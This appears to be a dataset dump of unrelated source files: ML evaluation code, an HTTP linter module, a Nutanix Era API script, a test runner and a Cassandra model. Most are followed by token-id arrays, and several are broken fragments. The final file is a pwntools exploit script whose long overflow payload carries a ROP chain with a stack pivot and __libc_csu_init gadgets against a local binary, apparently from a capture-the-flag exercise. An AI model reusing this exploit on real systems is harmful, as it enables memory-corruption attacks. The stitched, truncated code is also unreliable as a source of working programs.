chosen.append(neighbors[qname][j])
j +=1
while len(chosen) < 10:
chosen.append(0)
ranked_[qname] = chosen
return ranked_
if __name__ == '__main__':
neighbors = pickle.load(open(r'C:\Users\ASUS\Desktop\repositories\hum_to_find\neighbors.pkl', 'rb'))
val_data = pickle.load(open(r'C:\Users\ASUS\Desktop\repositories\hum_to_find\crepe_freq\val_data.pkl', 'rb'))
print(len(neighbors))
for qname, nbs in neighbors.items():
neighbors[qname] = [int(x) for x in neighbors[qname]]
rs = predict_song(neighbors)
print(len(rs))
mrr = []
for key in rs.keys():
for tup in val_data:
if key == tup[2]:
if int(tup[0]) not in list(rs[key]):
mrr.append(0)
else:
idx = list(rs[key]).index(int(tup[0])) +1
mrr.append(1/idx)
print(np.mean(mrr)) | [
6738,
19720,
1330,
360,
713,
11,
7343,
201,
198,
11748,
2298,
293,
201,
198,
201,
198,
11748,
299,
32152,
355,
45941,
201,
198,
201,
198,
201,
198,
4299,
4331,
62,
34050,
7,
710,
394,
32289,
25,
360,
713,
58,
2536,
11,
7343,
58,
6... | 2.026529 | 3,091 |
def count_parameters(model, verbose=True):
"""Count number of parameters in PyTorch model,
References: https://discuss.pytorch.org/t/how-do-i-check-the-number-of-parameters-of-a-model/4325/7.
from utils.utils import count_parameters
count_parameters(model)
import sys
sys.exit(1)
"""
n_all = sum(p.numel() for p in model.parameters())
n_trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
if verbose:
print("Parameter Count: all {:,d}; trainable {:,d}".format(n_all, n_trainable))
return n_all, n_trainable
| [
4299,
954,
62,
17143,
7307,
7,
19849,
11,
15942,
577,
28,
17821,
2599,
198,
220,
220,
220,
37227,
12332,
1271,
286,
10007,
287,
9485,
15884,
354,
2746,
11,
198,
220,
220,
220,
31458,
25,
3740,
1378,
15410,
1046,
13,
9078,
13165,
354,
... | 2.502146 | 233 |
# -*- coding: utf-8; -*-
from httpolice import request, response
from httpolice.blackboard import Blackboard
from httpolice.known import st
def complaint_box(*args, **kwargs):
"""Create an empty exchange that only carries a single notice.
This is used (for example, in :mod:`httpolice.framing1`)
to report notices that do not correspond to any particular message.
"""
box = Exchange(None, [])
box.complain(*args, **kwargs)
return box
def check_exchange(exch):
"""Run all checks on the exchange `exch`, modifying it in place."""
expect_100 = False
if exch.request:
request.check_request(exch.request)
expect_100 = exch.request.headers.expect == u'100-continue'
response.check_responses(exch.responses)
for resp in exch.responses:
if resp.status == st.continue_:
expect_100 = False
if expect_100 and resp.status == st.switching_protocols:
resp.complain(1305)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
26,
532,
9,
12,
198,
198,
6738,
2638,
349,
501,
1330,
2581,
11,
2882,
198,
6738,
2638,
349,
501,
13,
13424,
3526,
1330,
2619,
3526,
198,
6738,
2638,
349,
501,
13,
4002,
1330,
336,
628,... | 2.697222 | 360 |
import urllib
import cv2
import numpy as np
import os
create_pos_n_neg() | [
11748,
2956,
297,
571,
198,
11748,
269,
85,
17,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
28686,
628,
198,
17953,
62,
1930,
62,
77,
62,
12480,
3419
] | 2.642857 | 28 |
# Set creds and headers
era_user = '@@{era_creds.username}@@'
era_pass = '@@{era_creds.secret}@@'
headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}
# Get Software Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Software&name=@@{software_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "SOFTWARE_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Software Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get Compute Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Compute&name=@@{compute_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "COMPUTE_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Compute Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get Network Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Network&name=@@{network_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "NETWORK_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Network Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get DB Parameter ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Database_Parameter&name=@@{database_parameter}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "DB_PARAM_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get DB Parameter ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1) | [
2,
5345,
2600,
82,
290,
24697,
198,
8607,
62,
7220,
796,
705,
12404,
90,
8607,
62,
66,
445,
82,
13,
29460,
92,
12404,
6,
198,
8607,
62,
6603,
796,
705,
12404,
90,
8607,
62,
66,
445,
82,
13,
21078,
92,
12404,
6,
198,
50145,
796,
... | 2.561972 | 710 |
## Shorty
## Copyright 2009 Joshua Roesslein
## See LICENSE
## @url short.to
| [
2235,
10073,
88,
198,
2235,
15069,
3717,
20700,
5564,
408,
33663,
198,
2235,
4091,
38559,
24290,
198,
198,
2235,
2488,
6371,
1790,
13,
1462,
628
] | 3.16 | 25 |
#!/usr/bin/env python
import subprocess
import requests
import json
import time
import logging
try:
from Queue import Queue
except:
from queue import Queue
from threading import Thread, RLock
_LOG = logging.getLogger(__name__)
_LOG.setLevel(logging.DEBUG)
_lh = logging.StreamHandler()
_lh.setFormatter(logging.Formatter("[%(asctime)s] %(filename)s (%(lineno)3d): %(levelname) 8s: %(message)s"))
_LOG.addHandler(_lh)
NUM_TESTS = 0
FAILED_TESTS = []
FRAC_FLOAT_DIFF_TOL = 0.001
#########################################################################################
# The following code for execution in a non-blocking thread is from pyraphyletic. If
# we moved it to peyotl, we could import it from there (at the cost of making)
# otcetera depend on peyot.
class JobQueue(Queue):
"""Thread-safe Queue that logs the addition of a job to debug"""
def put(self, item, block=None, timeout=None):
"""Logs `item` at the debug level then calls base-class put"""
_LOG.debug("%s queued" % str(item))
Queue.put(self, item, block=block, timeout=timeout)
_jobq = JobQueue()
def worker():
"""Infinite loop of getting jobs off of _jobq and performing them."""
while True:
job = _jobq.get()
_LOG.debug('"{}" started"'.format(job))
try:
job.start()
except:
_LOG.exception("Worker dying.")
else:
try:
job.get_results()
except:
_LOG.exception("Worker exception. Error in job.get_results")
_LOG.debug('"{}" completed'.format(job))
_jobq.task_done()
_WORKER_THREADS = []
def start_worker(num_workers):
"""Spawns worker threads such that at least `num_workers` threads will be
launched for processing jobs in the jobq.
The only way that you can get more than `num_workers` threads is if you
have previously called the function with a number > `num_workers`.
(worker threads are never killed).
"""
assert num_workers > 0, "A positive number must be passed as the number of worker threads"
num_currently_running = len(_WORKER_THREADS)
for i in range(num_currently_running, num_workers):
_LOG.debug("Launching Worker thread #%d" % i)
t = Thread(target=worker)
_WORKER_THREADS.append(t)
t.setDaemon(True)
t.start()
#########################################################################################
_verb_name_to_req_method = {"GET": requests.get,
"PUT": requests.put,
"POST": requests.post,
"DELETE": requests.delete,
"HEAD": requests.head,
"OPTIONS": requests.options,
}
API_HEADERS = {'content-type' : 'application/json',
'accept' : 'application/json',
}
#########################################################################################
PIDFILE_NAME = "pidfile.txt"
RUNNING_SERVER = None
SERVER_PORT = 1985 # global, set by CLI. Needed by server launch and threads
SERVER_OUT_ERR_FN = "test-server-stdouterr.txt"
FAILED_TESTS, ERRORED_TESTS = [], []
if __name__ == '__main__':
import argparse
import codecs
import sys
import os
parser = argparse.ArgumentParser(description="Runs the otc-tol-ws and tests described in method.json files")
parser.add_argument('--taxonomy-dir', required=True, help='Directory that is the parent of the taxonomy files')
parser.add_argument('--synthesis-parent', required=True, help='Directory that is the parent of synthesis directories (if there is more than one subdirectory, then there will be multiple trees served - that option is not well tested).')
parser.add_argument('--exe-dir', required=True, help='Directory that holds the otc-tol-ws executable and which will be the working directory of the server.')
parser.add_argument('--tests-parent', required=True, help='Directory. Each subdir that holds a "method.json" file will be interpreted as a test.')
parser.add_argument('--test-name', default=None, required=False, help='Name of a subdir of the tests-parent dir. If provided only that test will be run; otherwise all of the tests will be run.')
parser.add_argument('--server-port', default=1985, type=int, required=False, help='Port number for the server')
parser.add_argument('--server-threads', default=4, type=int, required=False, help='Number of threads for the server')
parser.add_argument('--test-threads', default=8, type=int, required=False, help='Number of threads launched for running tests.')
parser.add_argument('--secs-to-recheck-pid-file', default=0, type=int, required=False, help='If the pid file exists, the process will enter a loop sleeping and rechecking for this number of seconds.')
args = parser.parse_args()
if args.server_threads < 1 or args.test_threads < 1:
sys.exit("The number of threads must be positive.")
taxonomy_dir = args.taxonomy_dir
if not os.path.isdir(taxonomy_dir):
sys.exit('Taxonomy directory "{}" does not exist.\n'.format(taxonomy_dir))
synth_par_path = args.synthesis_parent
if not os.path.isdir(synth_par_path):
sys.exit('Synthetic tree parent directory "{}" does not exist.\n'.format(synth_par_path))
exe_dir = args.exe_dir
if not os.path.isdir(exe_dir):
sys.exit('Executable directory "{}" does not exist.\n'.format(exe_dir))
test_par = args.tests_parent
if not os.path.isdir(test_par):
sys.exit('Tests parent directory "{}" does not exist.\n'.format(test_par))
if args.test_name is not None:
e_dir_list = [args.test_name]
else:
e_dir_list = get_test_dirs_under(test_par)
e_dir_list.sort()
SERVER_PORT = args.server_port
# Get test paths
to_run = []
for e_subdir_name in e_dir_list:
e_path = os.path.join(test_par, e_subdir_name)
if not os.path.isdir(e_path):
sys.stderr.write("Skipping test {} due to missing dir {} \n".format(e_subdir_name, e_path))
continue
mfile = os.path.join(e_path, "method.json")
if not os.path.isfile(mfile):
sys.stderr.write("Skipping test {} due to missing file {}\n".format(e_subdir_name, mfile))
continue
to_run.append(e_path)
if not to_run:
sys.exit("No test were found!")
# Check that there are no PIDfiles in the way
pidfile_path = os.path.join(exe_dir, PIDFILE_NAME)
if os.path.exists(pidfile_path):
recheck = 0
checks_per_sec = 3
while recheck < checks_per_sec*args.secs_to_recheck_pid_file:
recheck += 1
time.sleep(1.0/checks_per_sec)
if not os.path.exists(pidfile_path):
break
if os.path.exists(pidfile_path):
sys.exit("{} is in the way!\n".format(pidfile_path))
# try launching otc-tol-ws and running the tests against it.
for i in range(2):
if launch_server(exe_dir=exe_dir,
taxonomy_dir=taxonomy_dir,
synth_par=synth_par_path,
server_threads=args.server_threads):
try:
num_passed, nf, ne = run_tests(test_par, to_run, args.test_threads)
finally:
kill_server(exe_dir)
NUM_TESTS = nf + ne + num_passed
assert nf == len(FAILED_TESTS)
assert ne == len(ERRORED_TESTS)
sys.stderr.write('Passed {p:d}/{t:d} tests.'.format(p=num_passed, t=NUM_TESTS))
if FAILED_TESTS:
sys.stderr.write(' Failed:\n {}\n'.format('\n '.join(FAILED_TESTS)))
if ERRORED_TESTS:
sys.stderr.write(' Errors in:\n {}\n'.format('\n '.join(ERRORED_TESTS)))
if nf + ne > 0:
sys.exit(nf + ne)
sys.stderr.write('SUCCESS\n')
sys.exit(0)
else:
time.sleep(1) # relaunch (most likely cause is the port not being freed from previous test)
_LOG.error("Server launch failed: ")
with open(os.path.join(exe_dir, SERVER_OUT_ERR_FN), 'r') as seo:
sys.stderr.write(seo.read())
sys.exit(-1)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
11748,
850,
14681,
198,
11748,
7007,
198,
11748,
33918,
198,
11748,
640,
198,
11748,
18931,
198,
28311,
25,
198,
220,
220,
220,
422,
4670,
518,
1330,
4670,
518,
198,
16341,
25,
198,
22... | 2.37543 | 3,492 |
from cassandra.cluster import Cluster
from cassandra.cqlengine import connection
from cassandra.cqlengine.management import sync_table
from coins import Coin
CQLENG_ALLOW_SCHEMA_MANAGEMENT='CQLENG_ALLOW_SCHEMA_MANAGEMENT'
cluster=Cluster()
connection.setup(['127.0.0.1'], "cassy", protocol_version=3)
class CoinPrice
a = Coin()
##Cassandra coin model syncs to default cassandra connection under cassy keyspace.
##row key for time series data https://academy.datastax.com/resources/getting-started-time-series-data-modeling
#row partitioning:
# In some cases, the amount of data gathered for a single device isn’t practical to fit onto a single row. Cassandra can store up to 2 billion columns per row, but if we’re storing data every millisecond you wouldn’t even get a month’s worth of data. The solution is to use a pattern called row partitioning by adding data to the row key to limit the amount of columns you get per device. Using data already available in the event, we can use the date portion of the timestamp and add that to the weather station id. This will give us a row per day, per weather station, and an easy way to find the data. (figure 2)
# day = datetime.date.today().strftime('%m-%d-%Y')
# name = "XRP"
# ticker="XRPUSD"
# pair="XRPUSD"
# icon_url="https://www.google.com"
# price="0.8934"
# price=0.8934
# btc_price=0.00001
# created_at=datetime.datetime.now()
# source = "binance"
# a = Coin.create(day=day, name=name, ticker=ticker, pair=pair, icon_url=icon_url, price=price, btc_price=btc_price, source="binance", created_at=created_at)
| [
6738,
30606,
15918,
13,
565,
5819,
1330,
38279,
198,
6738,
30606,
15918,
13,
66,
13976,
18392,
1330,
4637,
198,
6738,
30606,
15918,
13,
66,
13976,
18392,
13,
27604,
1330,
17510,
62,
11487,
198,
6738,
10796,
1330,
16312,
198,
34,
9711,
2... | 3.175758 | 495 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import *
from genestack_client import Application, FilesUtil, GenestackException, Metainfo
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
198,
6738,
11593,
37443,
834,
1330,
7297,
198,
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
6738,
11593,
37443,... | 3.65625 | 96 |
#!/usr/bin/env python3
from pwn import *
context.update(arch = 'amd64', os = 'linux', log_level = 'info')
target = ELF('./target', checksec=False)
libc_2_24_so = ELF('./libc-2.24.so', checksec=False)
__libc_csu_init = 0x400840
__libc_csu_init_call_target = 0x400e48
__libc_csu_init_gadget1 = 0x400896
__libc_csu_init_gadget2 = 0x400880
canary = 0x0
libc_2_24_so_base = 0x0
pivot_dest = 0x601860
target_base = 0x0
target_leave_ret = 0x40074a
target_pop_rbp_ret = 0x400668
if __name__ == '__main__':
proc = process(['./ld-2.24.so', './target'], env={'LD_PRELOAD': './libc-2.24.so'})
payload = b'\x45\x76\x65\x72\x79\x74\x68\x69\x6e\x67\x20\x69\x6e\x74\x65\x6c\x6c\x69\x67\x65\x6e\x74\x20\x69\x73\x20\x73\x6f\x20\x62\x6f\x72\x69\x6e\x67\x2e\x6e\x57\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e
\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e
\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x96\x08\x40\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x48\x0e\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\x18\x60\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x80\x08\x40\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xe0\x05\x40\x00\x00\x00\x00\x00\x68\x06\x40\x00\x00\x00\x00\x00\x60\x18\x60\x00\x00\x00\x00\x00\x4a\x07\x40\x00\x00\x00\x00\x00\x6e\x6e\x6e\x6e\x6e
\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\